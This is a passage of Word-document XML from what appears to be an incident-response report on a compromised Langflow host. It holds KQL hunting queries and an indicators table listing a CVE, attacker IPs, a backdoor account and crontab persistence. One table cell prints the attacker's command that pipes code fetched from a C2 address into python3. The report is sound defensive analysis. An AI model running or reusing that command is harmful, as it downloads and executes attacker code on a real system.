          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">temporal property clustering, 17 minutes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:r>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Cross-reference of the full attacker chain (19:20:01 through 19:37:00) against benign python3.11 and cron activity spread across the day.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Query:</w:t>
      </w:r>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80"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="180" w:type="dxa"/>
              <w:top w:w="120" w:type="dxa"/>
              <w:right w:w="180" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="10080" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="616B91AF">
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">LLMAgentLogs_CL</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p w14:paraId="549005FC">
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| where session_id == "jp-7f3c9a21"</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p w14:paraId="2EA87B36">
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| project TimeGenerated, model_response</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p w14:paraId="64A6583D">
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| order by TimeGenerated asc</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| extend GapFromPrev = TimeGenerated - prev(TimeGenerated)</w:t>
            </w:r>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="160"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="100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80"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="single" w:color="999999" w:sz="6" w:space="0"/>
              <w:left w:val="single" w:color="999999" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="999999" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="999999" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:left w:w="150" w:type="dxa"/>
              <w:top w:w="260" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
              <w:bottom w:w="260" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="10080" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="4476D885">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr>
                <w:highlight w:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r/>
            <w:r>
              <mc:AlternateContent>
                <mc:Choice Requires="wpg">
                  <w:drawing>
                    <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                      <wp:extent cx="5943600" cy="2279792"/>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41125" name=""/>
                              <pic:cNvPicPr>
                                <a:picLocks noChangeAspect="1"/>
                              </pic:cNvPicPr>
                              <pic:nvPr/>
                            </pic:nvPicPr>
                            <pic:blipFill rotWithShape="1">
                              <a:blip r:embed="rId33"/>
                              <a:stretch/>
                            </pic:blipFill>
                            <pic:spPr bwMode="auto">
                              <a:xfrm rot="0" flipH="0" flipV="0">
                                <a:off x="0" y="0"/>
                                <a:ext cx="5943600" cy="22797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68.00pt;height:179.51pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;rotation:0;z-index:1;" stroked="false">
                      <v:imagedata r:id="rId33" o:title=""/>
                      <o:lock v:ext="edit" rotation="t"/>
                    </v:shape>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:highlight w:val="none"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:highlight w:val="none"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:highlight w:val="none"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:highlight w:val="none"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="15A7B277">
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0B1D62">
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">This buckets the legitimate cron/housekeeping activity by hour of day,  showing it spread fairly evenly across the full 24 hours rather than clustered into a tight window. The direct contrast to the attacker's 17-minute burst.</w:t>
      </w:r>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p w14:paraId="2531D2C6">
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Query:</w:t>
      </w:r>
      <w:r/>
      <w:r/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="100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0080"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="ffffff" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="180" w:type="dxa"/>
              <w:top w:w="120" w:type="dxa"/>
              <w:right w:w="180" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="10080" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="2B273B68">
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">LinuxSystem_CL</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p w14:paraId="0D89A754">
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| where Computer == "ff-lf-01" and Facility == "cron"</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p w14:paraId="0C58A655">
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| extend Hour = datetime_part("hour", TimeGenerated)</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p w14:paraId="75E7EFE8">
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| summarize Count = count() by Hour</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p w14:paraId="1DB7153D">
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| order by Hour asc</w:t>
            </w:r>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1D0A3507">
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="160"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:r/>
      <w:r/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="94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496"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="5511"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="single" w:color="999999" w:sz="6" w:space="0"/>
              <w:left w:val="single" w:color="999999" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="999999" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="999999" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:left w:w="150" w:type="dxa"/>
              <w:top w:w="260" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
              <w:bottom w:w="260" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="9496" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="029AA236">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r/>
            <w:r>
              <mc:AlternateContent>
                <mc:Choice Requires="wpg">
                  <w:drawing>
                    <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                      <wp:extent cx="1093847" cy="3684137"/>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587895" name=""/>
                              <pic:cNvPicPr>
                                <a:picLocks noChangeAspect="1"/>
                              </pic:cNvPicPr>
                              <pic:nvPr/>
                            </pic:nvPicPr>
                            <pic:blipFill rotWithShape="1">
                              <a:blip r:embed="rId34"/>
                              <a:stretch/>
                            </pic:blipFill>
                            <pic:spPr bwMode="auto">
                              <a:xfrm rot="0" flipH="0" flipV="0">
                                <a:off x="0" y="0"/>
                                <a:ext cx="1093846" cy="36841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86.13pt;height:290.09pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;rotation:0;z-index:1;" stroked="false">
                      <v:imagedata r:id="rId34" o:title=""/>
                      <o:lock v:ext="edit" rotation="t"/>
                    </v:shape>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r/>
            <w:r/>
            <w:r/>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="160"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="706"/>
        <w:pBdr/>
        <w:spacing w:after="120" w:before="300"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Indicators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200"/>
        <w:gridCol w:w="6160"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="1f3864"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Indicator</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="1f3864"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="6160" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Value</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Exploited endpoint</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="6160" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/v1/validate/code (Langflow, CVE-2025-3248)</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Exploit source IP</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="6160" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">64.20.53.230</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">C2 address</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="6160" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">45.131.66.106:4444</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Persistence</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="6160" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">crontab, /var/spool/cron/crontabs/langflow, */30 * * * *</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Persistence command</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="6160" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">curl -s http://45.131.66.106:4444/b | python3 -</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Backdoor account</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="6160" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">svc_maint (Nacos, ff-nacos-01)</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Compromised service account</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="6160" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">langflow (uid 999)</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
